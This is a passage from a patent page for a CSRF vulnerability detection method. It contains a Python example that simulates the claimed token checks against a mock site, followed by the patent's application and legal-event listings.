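    token_mode: "static"   -> one fixed Token per logged-in user, never refreshed
                "rotating" -> a fresh Token in every access response
                "missing"  -> the page carries no Token (extracted as "undefined")
    enforce:    whether state-changing requests are rejected without the current Token
    """
    token_mode: str
    enforce: bool
    _current: dict = field(default_factory=dict)
    _counter: int = 0

    def access(self, session: str) -> dict:
        """Access response for a request carrying `session` as its login state."""
        if self.token_mode == "missing":
            token = "undefined"
        elif self.token_mode == "static":
            token = f"tok-{session}"
        else:  # rotating
            self._counter += 1
            token = f"tok-{session}-{self._counter}"
        self._current[session] = token
        return {"status": 200, "token": token}

    def submit(self, session: str, token: Optional[str]) -> dict:
        """State-changing request (the Ajax call of claim 3, cookie sent cross-domain)."""
        if self.enforce and token != self._current.get(session):
            return {"status": 403, "body": "csrf token mismatch"}
        return {"status": 200, "body": "action performed"}


def detect_csrf(site: MockSite, set_time: float = 0.0) -> str:
    """Return the verdict reached by the claimed procedure for `site`."""
    first = site.access("user1")["token"]    # first access request, first user's login state
    second = site.access("user2")["token"]   # second access request, second user's login state

    # Claim 5: do not reason about values that are not real tokens.
    if first in TOKEN_BLACKLIST or second in TOKEN_BLACKLIST:
        return "skipped: token value on blacklist"

    # Claim 1 proceeds only when the two users' tokens differ; the equal case is
    # left undetermined here because the claims do not define it (example's choice).
    if first == second:
        return "undetermined: identical token for different users"

    time.sleep(set_time)  # "when the set time is up"
    third = site.access("user1")["token"]    # third access request, first user's login state again
    if third == first:
        return "vulnerable: token unchanged after the set time (claim 1)"

    # Claim 2: fourth request built in the site's interaction mode but without the
    # current Token; the fifth response is that of a legal request carrying it.
    fourth = site.submit("user1", token=None)
    fifth = site.submit("user1", token=third)
    if fourth == fifth:
        return "vulnerable: request without token answered like a legal one (claim 2)"
    return "not vulnerable"


if __name__ == "__main__":
    for mode, enforce in (("static", True), ("rotating", True), ("rotating", False), ("missing", True)):
        print(f"{mode:8} enforce={enforce!s:5} -> {detect_csrf(MockSite(mode, enforce))}")
```

The two "vulnerable" verdicts correspond to the two distinct defects the claims separate: a Token that is never refreshed (claim 1), and a Token that rotates but is not actually checked on the state-changing path (claim 2). A real scanner would replace `MockSite` with HTTP traffic captured by the crawler of claim 4 and compare whole responses rather than the small dicts used here.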

Priority Applications (2)

Application Number Priority Date Filing Date Title
CN201910549709.XA CN110113366B (en) 2019-06-24 2019-06-24 CSRF vulnerability detection method and device, computing device and storage medium
PCT/CN2020/096900 WO2020259389A1 (en) 2019-06-24 2020-06-18 Csrf vulnerability detection method and apparatus

Publications (2)

Publication Number Publication Date
CN110113366A CN110113366A (en) 2019-08-09
CN110113366B true CN110113366B (en) 2022-12-27

Also Published As

Publication number Publication date
CN110113366A (en) 2019-08-09
WO2020259389A1 (en) 2020-12-30

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant